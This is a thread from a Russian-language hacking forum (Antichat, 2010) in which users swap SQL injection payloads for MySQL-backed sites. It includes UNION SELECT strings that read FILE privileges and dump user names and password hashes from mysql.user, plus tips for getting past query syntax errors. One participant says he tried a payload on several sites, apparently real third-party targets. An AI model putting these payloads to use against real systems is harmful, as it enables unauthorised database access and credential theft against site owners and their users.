ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
21.01.2010, 02:50
|
|
Участник форума
Регистрация: 28.07.2008
Сообщений: 199
Провел на форуме:
861008
Репутация:
58
|
|
тест пустая табла или нет
...+select+count(*)+from+....
 |
|
|
21.01.2010, 18:48
|
|
Познающий
Регистрация: 10.08.2009
Сообщений: 30
Провел на форуме:
282022
Репутация:
4
|
|
Сообщение от j0ker13
тест пустая табла или нет
0 я так понял означает что таблица пуста? 
|
|
|
|
21.01.2010, 15:41
|
|
Познающий
Регистрация: 14.03.2009
Сообщений: 38
Провел на форуме:
250929
Репутация:
2
|
|
Ребята такой вопрос как узнать есть ли привелегия FILE в mysql через sql-inj,для версии 4.*.* и 5.*.* ?
|
|
|
|
21.01.2010, 16:36
|
|
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме:
3217552
Репутация:
1668
|
|
Сообщение от erolom
Ребята такой вопрос как узнать есть ли привелегия FILE в mysql через sql-inj,для версии 4.*.* и 5.*.* ?
Код:
site.com/new.php?id=-1+union+select+1,file_priv,3+from+mysql.user+where+user='username'/*
* где username - имя юзера под которым работает база.
Последний раз редактировалось RulleR; 21.01.2010 в 16:39..
|
|
|
|
21.01.2010, 15:42
|
|
Участник форума
Регистрация: 05.01.2009
Сообщений: 191
Провел на форуме:
3020589
Репутация:
240
|
|
file_priv
|
|
|
|
21.01.2010, 15:51
|
|
Познающий
Регистрация: 14.03.2009
Сообщений: 38
Провел на форуме:
250929
Репутация:
2
|
|
Сообщение от M.W.N.N.
file_priv
site.com/new.php?id=-1+union+select+1,file_priv,3--
так да?
щас просто попробывал на пару сайтов ошибка вылазит =/
|
|
|
|
21.01.2010, 15:55
|
|
Участник форума
Регистрация: 05.01.2009
Сообщений: 191
Провел на форуме:
3020589
Репутация:
240
|
|
выводит привилегии на доступ у юзеров.
site.com/new.php?id=-1+union+select+1,concat_ws(0x3a,user,password,file _priv),3+from+mysql.user--
|
|
|
|
21.01.2010, 20:21
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
прощу помочь с этим скулем:
http://localhost//?script=%2527
вывод:
Error You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%') or (t.page_title like '%'%') or (t.brief like '%'%') or (t.metakeywords like' at line 6 in
и пробовал
http://localhost//?script=%2527)+order+by+1+--+
тоже результат такой же ((
Как поступит в таком случае? Думал найду в других страничках но скул единственный |
|
|
|
21.01.2010, 20:36
|
|
Участник форума
Регистрация: 29.03.2005
Сообщений: 138
Провел на форуме:
812087
Репутация:
129
|
|
Сообщение от YuNi|[c
прощу помочь с этим скулем:
http://localhost//?script=%2527
вывод:
и пробовал
http://localhost//?script=%2527)+order+by+1+--+
тоже результат такой же ((
Как поступит в таком случае? Думал найду в других страничках но скул единственный
http://localhost/?script=%2527)/* - так запрос должен выполниться без ошибок.
http://localhost/?script=%2527) union select 1,2,3,user()/* - вот так будет sql-injection
Это к примеру,т.к точного уязвимого скрипта нет.
|
|
|
|
21.01.2010, 21:08
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
Сообщение от [NiGHT]DarkAngel
http://localhost/?script=%2527)/* - так запрос должен выполниться без ошибок.
http://localhost/?script=%2527) union select 1,2,3,user()/* - вот так будет sql-injection
Это к примеру,т.к точного уязвимого скрипта нет.
вроде ?script=%2527)/* норм но как добалю union select та же ошибка хз как обойти
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [NiGHT]DarkAngel](/avatars/avatar15948.jpg?1843332){kind=avatar}
Похожие темы
Комбинированный вид